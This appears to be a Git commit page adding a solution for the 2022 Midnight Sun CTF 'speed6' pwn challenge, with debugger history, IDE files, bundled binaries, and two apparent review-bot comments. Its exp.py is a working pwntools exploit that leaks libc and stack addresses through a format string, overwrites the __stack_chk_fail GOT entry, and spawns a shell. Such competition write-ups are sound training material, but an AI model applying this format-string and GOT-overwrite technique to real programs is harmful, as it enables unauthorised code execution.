提交
da4c70a4
编写于
8月 08, 2023
作者:
_sky123_
update
上级
e1b8b276
变更
13
Showing
13 changed file
with
206 addition
and
0 deletion
+206
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281.tar.gz
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281.tar.gz
+0
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.gdb_history
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.gdb_history
+124
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/.gitignore
...wn/2022MidnightSunCTF_speed6/speed6_f281/.idea/.gitignore
+3
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/inspectionProfiles/profiles_settings.xml
...peed6_f281/.idea/inspectionProfiles/profiles_settings.xml
+6
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/misc.xml
..._pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/misc.xml
+4
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/modules.xml
...n/2022MidnightSunCTF_speed6/speed6_f281/.idea/modules.xml
+8
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/speed6_f281.iml
...22MidnightSunCTF_speed6/speed6_f281/.idea/speed6_f281.iml
+8
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/vcs.xml
...c_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/vcs.xml
+6
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/exp.py
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/exp.py
+47
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/ld-2.31.so
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/ld-2.31.so
+0
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/libc.so.6
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/libc.so.6
+0
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6
+0
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6_patch
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6_patch
+0
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281.tar.gz
0 → 100755
文件已添加
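--- a/glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.gdb_history
+++ b/glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.gdb_history
@@ -0,0 +1,124 @@
+c
+c
+c
+vmmap
+checksec
+c
+stack 50
+x/20gx 0xfff17c64-0x94
+ni
+c
+stack 60
+p/x 37
+ni
+stack 60
+c
+ni
+stack 60
+c
+c
+stack 60
+c
+c
+c
+c
+stack 60
+c
+c
+c
+stack 60
+c
+c
+c
+c
+c
+stack 60
+c
+stack 70
+c
+c
+stack 70
+c
+c
+p/x 85
+q
+c
+stack 30
+q
+c
+stack 100
+ni
+stack 100
+p/x 37
+stack 100
+p/x 85
+p/x 0xffa7fc24-0x94
+c
+ni
+c
+q
+c
+c
+q
+c
+canary
+canary
+stack 30
+tls
+q
+c
+c
+ni
+telescope 0xff983b18-0xc
+q
+q
+c
+got
+x/gx 0804c01c
+telescope 0x0804c01c
+q
+c
+got
+telescope 0x0804c01c
+q
+c
+c
+ni
+stack 70
+p/x 85
+stack 70
+q
+c
+stack 30
+telescope 0xffdb6bd0 50
+p/x 0xffdb6bdc+0xc-0xffdb6bd0
+p/x 0xffdb6bdc+0x3c-0xffdb6bd0
+q
+c
+k
+x/gx 0xffac0890+0x48
+p/x 0xfface370-0xc
+q
+c
+q
+c
+got
+telescope 0x0804c01c
+q
+c
+c
+stack 30
+ni
+stack 30
+p/x 0xffdf49e8-0xffdf49a0
+p/x 0x48*4
+p/x 0x48-0x3c
+p/x (0x48-0x3c)+0x100
+p/x (0x48-0x3c)+0x100
+p/x 0x100-0xc
+p/x0x10c/4
+q
+c
+ni
+c
+q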
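Review bot: `.gdb_history` is a per-user debugger session log and, together with the `.idea/` files added in the same commit, looks like local tool state committed by accident rather than part of the write-up. The stack addresses it records differ from one entry to the next (for example `x/20gx 0xfff17c64-0x94` and `p/x 0xffa7fc24-0x94`), so they appear to come from separate runs and do not document anything a reader can rerun. I would drop these files from the commit and add `.gdb_history` and `.idea/` to the repository's `.gitignore`; the offsets that matter belong as comments in `exp.py`.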
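--- a/glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/.gitignore
+++ b/glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/.gitignore
@@ -0,0 +1,3 @@
+# 默认忽略的文件
+/shelf/
+/workspace.xml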
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/inspectionProfiles/profiles_settings.xml
0 → 100644
<component
name=
"InspectionProjectProfileManager"
>
<settings>
<option
name=
"USE_PROJECT_PROFILE"
value=
"false"
/>
<version
value=
"1.0"
/>
</settings>
</component>
\ No newline at end of file
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/misc.xml
0 → 100644
<?xml version="1.0" encoding="UTF-8"?>
<project
version=
"4"
>
<component
name=
"ProjectRootManager"
version=
"2"
project-jdk-name=
"Python 2.7"
project-jdk-type=
"Python SDK"
/>
</project>
\ No newline at end of file
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/modules.xml
0 → 100644
<?xml version="1.0" encoding="UTF-8"?>
<project
version=
"4"
>
<component
name=
"ProjectModuleManager"
>
<modules>
<module
fileurl=
"file://$PROJECT_DIR$/.idea/speed6_f281.iml"
filepath=
"$PROJECT_DIR$/.idea/speed6_f281.iml"
/>
</modules>
</component>
</project>
\ No newline at end of file
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/speed6_f281.iml
0 → 100644
<?xml version="1.0" encoding="UTF-8"?>
<module
type=
"PYTHON_MODULE"
version=
"4"
>
<component
name=
"NewModuleRootManager"
>
<content
url=
"file://$MODULE_DIR$"
/>
<orderEntry
type=
"jdk"
jdkName=
"Python 2.7"
jdkType=
"Python SDK"
/>
<orderEntry
type=
"sourceFolder"
forTests=
"false"
/>
</component>
</module>
\ No newline at end of file
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/vcs.xml
0 → 100644
<?xml version="1.0" encoding="UTF-8"?>
<project
version=
"4"
>
<component
name=
"VcsDirectoryMappings"
>
<mapping
directory=
"$PROJECT_DIR$/../../.."
vcs=
"Git"
/>
</component>
</project>
\ No newline at end of file
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/exp.py
0 → 100644
from
pwn
import
*
elf
=
ELF
(
"./speed6"
)
libc
=
ELF
(
"./libc.so.6"
)
context
(
arch
=
elf
.
arch
,
os
=
elf
.
os
)
# context.log_level = 'debug'
p
=
process
([
elf
.
path
])
n16
=
lambda
x
:
(
x
+
0x10000
)
&
0xFFFF
p
.
sendlineafter
(
"f5b: "
,
"%2$p||%37$p"
)
p
.
recvuntil
(
"0x"
)
libc
.
address
=
int
(
p
.
recvuntil
(
"||"
,
drop
=
True
),
16
)
-
libc
.
sym
[
'_IO_2_1_stdin_'
]
log
.
success
(
"libc base: "
+
hex
(
libc
.
address
))
stack_addr
=
int
(
p
.
recvuntil
(
"
\n
"
,
drop
=
True
),
16
)
-
0x55
*
4
log
.
success
(
"stack: "
+
hex
(
stack_addr
))
def
arbitrary_offset_write
(
offset
,
value
):
assert
(
stack_addr
&
0xFFFF
)
+
offset
<
(
1
<<
16
)
and
value
<
(
1
<<
16
)
p
.
sendlineafter
(
'f5b: '
,
'%{}c%37$hn'
.
format
((
stack_addr
+
offset
)
&
0xFFFF
))
p
.
sendlineafter
(
'f5b: '
,
'%{}c%85$hn'
.
format
(
value
))
def
arbitrary_address_write
(
address
,
value
):
assert
address
<
(
1
<<
32
)
and
value
<
(
1
<<
16
)
arbitrary_offset_write
(
0x30
*
4
,
address
&
0xFFFF
)
arbitrary_offset_write
((
0x30
*
4
+
2
)
&
0xFFFF
,
address
>>
16
)
p
.
sendlineafter
(
'f5b: '
,
'%{}c%48$hn'
.
format
(
value
&
0xFFFF
))
add_esp_ret
=
libc
.
search
(
asm
(
'add esp, 0x100; sub eax, edx; ret;'
),
executable
=
True
).
next
()
arbitrary_address_write
(
elf
.
got
[
'__stack_chk_fail'
],
add_esp_ret
&
0xFFFF
)
arbitrary_address_write
(
elf
.
got
[
'__stack_chk_fail'
]
+
2
,
add_esp_ret
>>
16
)
system_addr
=
libc
.
sym
[
'system'
]
bin_sh_addr
=
libc
.
search
(
'/bin/sh'
).
next
()
arbitrary_offset_write
(
0x43
*
4
,
system_addr
&
0xFFFF
)
arbitrary_offset_write
(
0x43
*
4
+
2
,
system_addr
>>
16
)
arbitrary_offset_write
(
0x45
*
4
,
bin_sh_addr
&
0xFFFF
)
arbitrary_offset_write
(
0x45
*
4
+
2
,
bin_sh_addr
>>
16
)
# gdb.attach(p, 'b *{}'.format(hex(add_esp_ret)))
# pause()
arbitrary_offset_write
(
0x1c
,
0x1
)
# change canary to call the __stack_chk_fail
p
.
interactive
()
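Review bot: The format-string argument indices and stack offsets in exp.py (`%37$hn`, `%85$hn`, `%48$hn`, `0x55 * 4`, `0x30 * 4`, `0x43 * 4`, `0x45 * 4`, `0x1c`) are bare literals with nothing saying how they were measured or which build they hold for, so the script cannot be checked against the bundled `speed6` and `libc.so.6` without repeating the debugging session. I would add a module docstring naming the challenge and the bundled glibc, and stating the conditions the writes depend on: a 32-bit target and a writable `__stack_chk_fail` GOT entry (presumably no full RELRO, which is also the mitigation that would stop this overwrite), with the offsets turned into named constants. `n16` is defined and never called and can be removed. `.next()` on the `libc.search(...)` results exists only on Python 2 iterators, which matches the `Python 2.7` interpreter in the committed `.idea` files but ties the script to it; `next(libc.search(...))` is the portable spelling. The two `assert` lines are the only argument checks, disappear under `-O`, and do not reject negative values.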
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/ld-2.31.so
0 → 100755
文件已添加
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/libc.so.6
0 → 100755
文件已添加
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6
0 → 100755
文件已添加
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6_patch
0 → 100755
文件已添加